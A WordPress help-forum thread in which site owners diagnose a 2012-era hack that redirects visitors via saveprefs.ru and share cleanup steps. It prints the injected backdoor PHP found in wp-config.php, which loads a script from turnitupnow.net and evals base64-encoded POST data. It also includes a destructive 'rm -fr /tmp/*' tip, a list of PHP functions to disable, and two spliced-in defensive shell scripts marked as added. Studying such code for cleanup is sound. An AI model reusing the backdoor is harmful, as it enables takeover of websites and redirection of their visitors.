3.3.1 Hacked by saveprefs.ru redirect
Hi everyone, I have just been hacked. I am a web developer, and have about 20-30 WordPress sites, all of them running 3.3.1. They all seem to have been hacked. Here’s one you can look at: if you search Google for harmonyhomes.net and click on the link from Google, you will see that it goes to https://saveprefs.ru/astro/index.php first, then to msn.ca. Can anyone please help me find the code? I really don’t want to have to try to restore all my sites from backups.
Thank you all.
Jamie
@jamieedwards Yeah, I looked for it, but it’s not on my server.
@impackt Can I borrow your guardian angel, just for a night?
I’m pretty sure by now that it’s not an issue that I myself can resolve. In my FTP client I saw this popping up:
[22:45:36] 211-Status of .htaccess: [22:45:36] -r--r--r-- 1 henkleurinknl psacln 3519 Jan 17 21:34 .htaccess
henkleurinknl and psacln being websites of two other people – unfamiliar to me – who, not surprisingly, have also been compromised.
The problem seems to be lying somewhere else. Which does nót comfort me.
Hmmmm, after my last post I am not convinced… Patched timthumb.php, deleted all .htaccess files, and 20 minutes later they are all back ??
I have 3 1and1 accounts but only one of them has this problem; maybe the server is infected?
The server ip address is 50.21.189.85, are you on the same server?
@pkwooster On FreeBSD based hosting there is an OS utility, mtree, that can calculate and later compare hashes of any directories/files. Linux based OSes need a third-party application called tripwire that does the same. Ask your provider what they have. It is better than a plugin because those programs have system-wide permissions 555 and can be hacked only if the attacker gains root privilege.
@jamieedwards, malicious scripts automatically search everywhere beginning from the root directory. Take a look at what kind of information was taken:
[Code moderated as per the Forum Rules. Please use the pastebin]
If you restrict dangerous functions in php.ini (and restarted the HTTP server after that) and you still continue to have the problem, try to delete everything in /tmp like this: rm -fr /tmp/*. Some systems may allow you read/write access to /var/tmp, so delete everything from there too. If you know other places where you have write permissions, take a look at those places too.
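The mtree/tripwire idea above, as an added example (not from the thread or any poster): a minimal baseline-and-compare script built from sha256sum, find and comm, with a constructed fake docroot showing a rewritten .htaccess and a dropped _cache.php being flagged.

```shell
#!/bin/sh
# Added example (not from the thread): a minimal tripwire/mtree-style
# integrity check built from sha256sum, find and comm, so a docroot can be
# baselined after cleanup and re-checked later for rewritten or dropped
# files. Assumes GNU coreutils and paths without whitespace.

# Record the sha256 of every regular file under $1 into baseline file $2.
# Keep $2 outside the web root so it is neither served nor rescanned.
make_baseline() {
    find "$1" -type f -print0 | sort -z | xargs -0 sha256sum > "$2"
}

# Compare tree $1 against baseline $2. Prints CHANGED / MISSING / ADDED
# lines and returns 1 if anything differs, 0 if the tree is untouched.
check_baseline() {
    dir=$1; base=$2; now=$(mktemp); rc=0
    make_baseline "$dir" "$now"
    while read -r hash path; do
        if [ ! -f "$path" ]; then
            echo "MISSING $path"; rc=1
        elif ! grep -qxF "$hash  $path" "$now"; then
            echo "CHANGED $path"; rc=1      # e.g. a rewritten .htaccess
        fi
    done < "$base"
    # Files the baseline never saw: _cache.php, random-named *.php in
    # uploads/ or a theme temp/ folder, new timthumb.php copies, etc.
    awk '{print $2}' "$base" | sort > "$now.old"
    awk '{print $2}' "$now"  | sort > "$now.new"
    added=$(comm -13 "$now.old" "$now.new")
    if [ -n "$added" ]; then
        printf '%s\n' "$added" | sed 's/^/ADDED /'; rc=1
    fi
    rm -f "$now" "$now.old" "$now.new"
    return $rc
}

# Constructed demo: a tiny fake docroot, baselined while clean, then altered
# the way the thread describes (.htaccess rewritten, _cache.php dropped
# into wp-content/uploads). Prints the findings.
demo_wp_site() {
    d=$(mktemp -d)
    mkdir -p "$d/wp-content/uploads" "$d/wp-includes"
    echo "# clean rewrite rules" > "$d/.htaccess"
    echo "<?php // wp-settings" > "$d/wp-settings.php"
    make_baseline "$d" "$d.base"
    echo "# rules injected by the dropper" > "$d/.htaccess"
    echo "<?php // dropper" > "$d/wp-content/uploads/_cache.php"
    check_baseline "$d" "$d.base" || true
    rm -rf "$d" "$d.base"
}
```

Run make_baseline right after a verified-clean reinstall and check_baseline from cron; anything it prints between updates deserves a look.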
Look for an _cache.php file. The security guy said that was where all the .htaccess files were coming from. Mine was in /wp-content/uploads.
I have just deleted this file; now I will remove the .htaccess files again and wait 30 minutes to see if that in fact got rid of the problem :/
I’ll keep you posted as I work on it.
@tehranshahr, no I seem to be on a different 1and1 server. All my sites are pinging to 74.208.210.66
Don’t wanna spoil the fun, but there’s no _cache.php on my server.
@jamieedwards
Ok, but it seems the problem is from the server. I’m testing a way to make sure that this problem is from the server; I’ll post the result tomorrow.

Ok, so it’s been over an hour and a half now and it looks like I don’t have any more infected .htaccess files showing up. There were a bunch of files that the security guy at 1and1 found that were corrupted: timthumb.php files that were in places I didn’t know about, such as some plugin folders, and also all of my /wp-includes/js/plupload/plupload.html4.js files seemed to have been compromised on each of my sites. I deleted these files, and the _cache.php file (one of the files used to create the bogus .htaccess files), and also a whole bunch of random numbered files that were in a /wp-content/themes/mytheme/temp folder; one of them was called 7a7f9c188164e70ad99de9734ad7b524.php for instance, but they are all random numbers. I tell you all of this but that wouldn’t have stopped anything unless he shut down the shell sessions first, otherwise the connection to my files was still open and they could have just uploaded more files. So you will need to do this, or get someone at your hosting company to do it for you.
Now I am off to change all of my admin passwords once again just in case!
Blessings to all of you, I pray you all get the solutions you need to get your sites back up and running quickly.
Jamie

Hello Everyone,
Hacks by their very nature are insidious and cannot be second-guessed in any way.
I have seen code embedded in .gif files that was then extracted using base64 to run the code pulled from the .gif file. How crazy is that?
Here is the best way to fix issues for a hack that does not seem to have a particular clean cut resolution that anyone can follow. For your own sanity this is the most reliable way to be absolutely sure your hack is gone.
You will need to ask your Host to open a new account and apply whatever money is left for hosting of the current (hacked) account to the new account.
STEP 1
Perform a new install of WordPress (latest version).
STEP 2
Make sure all re-installed plugins are freshly downloaded from their source and compatible with the latest version of WordPress.
STEP 3
Export your database from WordPress using the XML database export tool from WordPress.
STEP 4
Download all image content to your local drive to FTP up to the new account later.
STEP 5
Make sure you recreate all folders you may have had in the old site in the new site. Put all content in its respective place. Take extensive notes for each plugin as to their configuration, as well as all WordPress specific settings, i.e. anything you need to know before leaving the old site behind. Be very methodical in this step, otherwise you will create more work for yourself.
STEP 6
Import your database (previously exported) into the new WordPress site.
Put all image content where it goes in its respective location/folders.
If you made accurate notes and copied everything down from the old site, it will be nothing more than a logistical exercise.
FINAL NOTE:
Always make your website as secure as you can with best practices.
Long passwords . . . changed every 6 months without fail, including your FTP account p/w’s.
Install the Login lockdown plugin, WSD Security plugin and follow their instructions.
Never leave the Default “Admin” account in place. Always create a new “Admin” account with the name Admin. Better yet do not use any word in any language for the user name. Make your User name and password 25 characters in length using all valid upper lower case as well as special characters accepted by WordPress.
You are now equipped to weather the storm, and keep those passwords rotated every six months, even if you have to schedule software to remind you to.
Granted this is not fun if you have many sites like many people but it does work.
Hello there,
I have the same issue and I have been trying everything for 2 days now, but whatever I do the .htaccess files are rewritten ??
I can’t locate the infected files in my wp-content… Do you have any tips to find them?
thanks
Hello,
Since yesterday night, unfortunately, I again found activities on my server. Again several w????????w.php scripts (e.g. w77688816w.php) are coming up. In addition, I found a script sm5ek3.php (https://pastebin.com/rekKbXJb), which probably is the one described here: https://www.webhackblog.com/2011/10/31/sm3-php-spam-script/
I now decided to be more radical. Steps I have done:
– deleted all older content that is not needed any more in DocumentRoot (made a backup before that with tar)
– made a backup of all plugins (tar)
– deleted all plugins (plan is to reinstall the needed ones later)
– deleted all older themes (I only keep the new ones that come with the fresh WordPress installation)
– followed old_fart’s recommendation to disable functions in PHP
— old-fart recommendation —
1. locate your php.ini file
2. replace
disable_functions =
with
disable_functions = "apache_child_terminate, apache_setenv, define_syslog_variables, escapeshellarg, escapeshellcmd, eval, exec, fp, fput, ftp_connect, ftp_exec, ftp_get, ftp_login, ftp_nb_fput, ftp_put, ftp_raw, ftp_rawlist, highlight_file, ini_alter, ini_get_all, ini_restore, inject_code, mysql_pconnect, openlog, passthru, php_uname, phpAds_remoteInfo, phpAds_XmlRpc, phpAds_xmlrpcDecode, phpAds_xmlrpcEncode, popen, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_setuid, posix_uname, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate, shell_exec, syslog, system, xmlrpc_entity_decode"
3. force to restart http server
—– find and afterwards delete malware files by …
– … find . -name 'sm*.php' -print
– … find . -name 'w?????????.php' -print
– delete all .htaccess files with > find . -name '.htaccess' -exec rm {} \;
– recreate my wp-config.php from scratch!!!!
In the old one, I found this code, which probably isn’t anything I’d like to have. Maybe this is the backdoor??:

    <?php
    global $sessdt_o;
    if(!$sessdt_o) {
        $sessdt_o = 1;
        $sessdt_k = "lb11";                       // cookie name used to track visitors
        if(!@$_COOKIE[$sessdt_k]) {
            // first visit: set the marker cookie (via header, or inline JS if headers are out)
            $sessdt_f = "102";
            if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); }
            else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; }
        } else {
            if($_COOKIE[$sessdt_k]=="102") {
                // second visit: replace the cookie with a random value and redirect once
                $sessdt_f = (rand(1000,9000)+1);
                if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); }
                else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; }
                $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"];
                $sessdt_v = urlencode(strrev($sessdt_j));
                $sessdt_u = "https://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200);
                echo "<script src='$sessdt_u'></script>";
                echo "<meta http-equiv='refresh' content='0;url=https://$sessdt_j'><!--";
            }
        }
        // backdoor: any POST carrying a "showimg" field is base64-decoded and eval'd
        $sessdt_p = "showimg";
        if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;}
    }

The above code is explained here: https://stackoverflow.com/questions/8068871/got-hacked-anyone-know-what-this-php-code-does
This code is also present in most of the PHP files of my theme!! I have to clean this up!
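The find commands and the injected snippet from the post above, turned into a reusable read-only sweep; this is an added example, not code from the thread. The demo tree and its file names are constructed from the ones the thread mentions.

```shell
#!/bin/sh
# Added example (not from the thread): a read-only sweep for the indicators
# this thread describes. It only lists suspects; review hits before deleting.
# Assumes GNU grep and GNU find.

# Grep *.php under $1 for the injected snippet's tells: its $sessdt_ globals
# and the eval(base64_decode(...)) backdoor it ends with.
find_injected_php() {
    grep -rlE --include='*.php' \
        -e '\$sessdt_[a-z]' \
        -e 'eval\(base64_decode\(' "$1" | sort
}

# Filenames the cleanup posts looked for: sm*.php, w<8 digits>w.php and
# 32-hex-character names such as those found in a theme temp/ folder.
find_suspicious_names() {
    find "$1" -regextype posix-extended -type f \( -name 'sm*.php' \
        -o -name 'w????????w.php' -o -regex '.*/[0-9a-f]{32}\.php' \) | sort
}

# Constructed demo tree: one clean theme file, one carrying the tells (a
# marker only, not the full snippet), plus two oddly named drop files.
# Prints paths relative to the tree root.
demo_theme_sweep() {
    d=$(mktemp -d)
    mkdir -p "$d/wp-content/themes/mytheme/temp" "$d/wp-content/uploads"
    echo '<?php get_header(); ?>' > "$d/wp-content/themes/mytheme/index.php"
    echo '<?php global $sessdt_o; /* ... eval(base64_decode( ... */ ?>' \
        > "$d/wp-content/themes/mytheme/header.php"
    : > "$d/wp-content/uploads/w77688816w.php"
    : > "$d/wp-content/themes/mytheme/temp/7a7f9c188164e70ad99de9734ad7b524.php"
    { find_injected_php "$d"; find_suspicious_names "$d"; } | sed "s|^$d/||"
    rm -rf "$d"
}
```

A clean tree prints nothing; pair this with a fresh wp-config.php and a verified reinstall, since the sweep only knows the patterns seen in this thread.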